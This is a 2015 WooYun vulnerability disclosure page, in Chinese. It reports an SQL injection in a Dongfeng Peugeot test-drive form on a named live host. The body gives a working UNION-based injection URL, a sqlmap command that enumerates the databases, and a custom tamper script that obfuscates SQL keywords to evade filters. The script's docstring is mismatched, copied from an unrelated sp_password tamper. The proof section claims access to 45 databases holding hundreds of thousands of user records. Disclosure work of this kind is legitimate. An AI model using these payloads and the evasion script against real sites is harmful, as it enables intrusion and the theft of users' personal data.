当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149552

漏洞标题:东风标致官网存在SQL注入

相关厂商:dfyb.com

漏洞作者: 我在不想理你

提交时间:2015-10-26 15:18

修复时间:2015-10-31 15:20

公开时间:2015-10-31 15:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

注入点:http://301.peugeot.com.cn/testdrive/form.php?cselect=3434&pselect=3428
5.6.11mysql数据库
http://301.peugeot.com.cn/testdrive/form.php?cselect=3434&pselect=3428 /*!and*/ 1=2 /*!union*/ /*!select*/ 1,version(),3
跑sqlmap
python sqlmap.py -u "http://301.peugeot.com.cn/testdrive/form.php?cselect=3434&pselect=3428" --technique U --tamper union.py --dbs
以下是union.py tamper脚本

#!/usr/bin/env python """ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGH def tamper(payload, **kwargs): """ Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs Requirement: * MSSQL Notes: * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure * Reference: http://websec.ca/kb/sql_injection >>> tamper('1 AND 9227=9227-- ') '1 AND 9227=9227-- sp_password' """ return payload.replace('AND ','/*!AND*/').replace('UNION ','/*!UNION*/').replace('ORDER ','/*!ORDER*/').replace('BY ','/*!BY*/').replace('SELECT ','/*!SELECT*/').replace('FROM ','/*!FROM*/').replace('WHERE ','/*!WHERE*/').replace('WHEN ','/*!WHEN*/').replace('ELSE ','/*!ELSE*/').replace('THEN ','/*!THEN*/').replace('END ','/*!END*/').replace('IF ','/*!IF*/').replace('IFNULL','/*!IFNULL*/').replace('AS ','/*!AS*/').replace('LIMIT','/*!LIMIT*/').replace('IN ','/*!IN*/')

漏洞证明:

45个数据库
总共数十万用户数据

233333333333333.PNG

修复方案:

修复sql注入

版权声明:转载请注明来源 我在不想理你@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-31 15:20

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无